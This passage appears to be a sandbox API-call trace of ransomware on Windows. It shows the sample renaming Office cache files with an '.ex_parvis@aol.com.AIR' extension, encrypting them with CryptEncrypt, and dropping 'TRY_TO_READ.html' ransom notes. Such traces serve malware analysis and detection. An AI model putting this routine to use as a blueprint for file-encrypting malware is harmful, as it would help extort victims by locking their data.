"c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0144.492] GetProcessHeap () returned 0x2e0000 [0144.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.492] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=519584) returned 1 [0144.492] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x7eda0 [0144.492] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.492] GetProcessHeap () returned 0x2e0000 [0144.492] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.493] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.493] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.494] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.494] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.494] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7eda0) returned 0x30d0048 [0144.496] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x7eda0) returned 0x31d0048 [0144.498] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.498] ReadFile (in: hFile=0x49c, lpBuffer=0x30d0048, nNumberOfBytesToRead=0x7eda0, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesRead=0x2acf9c8*=0x7eda0, lpOverlapped=0x0) returned 1 [0144.510] SetFilePointer (in: hFile=0x49c, lDistanceToMove=-519584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.510] WriteFile (in: hFile=0x49c, lpBuffer=0x31d0048*, nNumberOfBytesToWrite=0x7eda0, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x7eda0, lpOverlapped=0x0) returned 1 [0144.512] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0144.515] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0144.520] CloseHandle (hObject=0x49c) returned 1 [0144.525] GetProcessHeap () returned 0x2e0000 [0144.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0144.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0144.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0144.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0144.526] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0144.526] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0144.526] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0144.526] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.526] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.526] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", dwFileAttributes=0x80) returned 1 [0144.527] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 75 [0144.527] GetProcessHeap () returned 0x2e0000 [0144.527] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0144.527] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" [0144.527] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0144.527] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.530] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0144.530] GetProcessHeap () returned 0x2e0000 [0144.530] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.530] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=526176) returned 1 [0144.530] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x80760 [0144.530] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.530] GetProcessHeap () returned 0x2e0000 [0144.530] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.530] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.530] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.532] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.532] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.532] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80760) returned 0x33d0020 [0144.532] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80760) returned 0x3460020 [0144.533] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.533] ReadFile (in: hFile=0x49c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x80760, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x80760, lpOverlapped=0x0) returned 1 [0144.583] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.583] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.583] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", dwFileAttributes=0x80) returned 1 [0144.583] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 72 [0144.583] GetProcessHeap () returned 0x2e0000 [0144.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf6) returned 0x31d0048 [0144.583] lstrcpyW (in: lpString1=0x31d0048, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" [0144.583] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR" [0144.584] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.587] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0144.587] GetProcessHeap () returned 0x2e0000 [0144.587] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0144.587] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=838536) returned 1 [0144.587] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xccb88 [0144.587] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.587] GetProcessHeap () returned 0x2e0000 [0144.587] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.587] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.587] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.597] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.597] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.597] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xccb88) returned 0x33d0020 [0144.598] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xccb88) returned 0x34a0020 [0144.598] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.598] ReadFile (in: hFile=0x49c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xccb88, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xccb88, lpOverlapped=0x0) returned 1 [0144.629] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0144.629] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0144.629] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", dwFileAttributes=0x80) returned 1 [0144.630] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 76 [0144.630] GetProcessHeap () returned 0x2e0000 [0144.630] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0144.630] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" [0144.630] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0144.630] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0144.633] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x49c [0144.633] GetProcessHeap () returned 0x2e0000 [0144.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0144.633] GetFileSizeEx (in: hFile=0x49c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=596341) returned 1 [0144.633] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x91975 [0144.633] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0144.633] GetProcessHeap () returned 0x2e0000 [0144.633] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0144.633] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0144.633] WriteFile (in: hFile=0x49c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0144.635] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0144.635] WriteFile (in: hFile=0x49c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0144.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x91975) returned 0x33d0020 [0144.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x91975) returned 0x3470020 [0144.636] SetFilePointer (in: hFile=0x49c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.636] ReadFile (in: hFile=0x49c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x91975, lpOverlapped=0x0) returned 1 [0144.660] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e158 [0144.660] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0144.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] FindNextFileW (in: hFindFile=0x35e158, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0144.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0144.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] FindNextFileW (in: hFindFile=0x35e158, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0144.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0144.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.661] GetLastError () returned 0x0 [0144.661] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a0 [0144.664] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0110 | out: hHeap=0x2e0000) returned 1 [0144.664] WriteFile (in: hFile=0x4a0, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0144.665] WriteFile (in: hFile=0x4a0, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0144.665] WriteFile (in: hFile=0x4a0, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0144.665] CloseHandle (hObject=0x4a0) returned 1 [0144.665] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0144.665] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383db0 | out: hHeap=0x2e0000) returned 1 [0144.665] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0144.666] FindNextFileW (in: hFindFile=0x35e158, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0144.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329128 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] FindNextFileW (in: hFindFile=0x35e158, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0144.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0144.666] 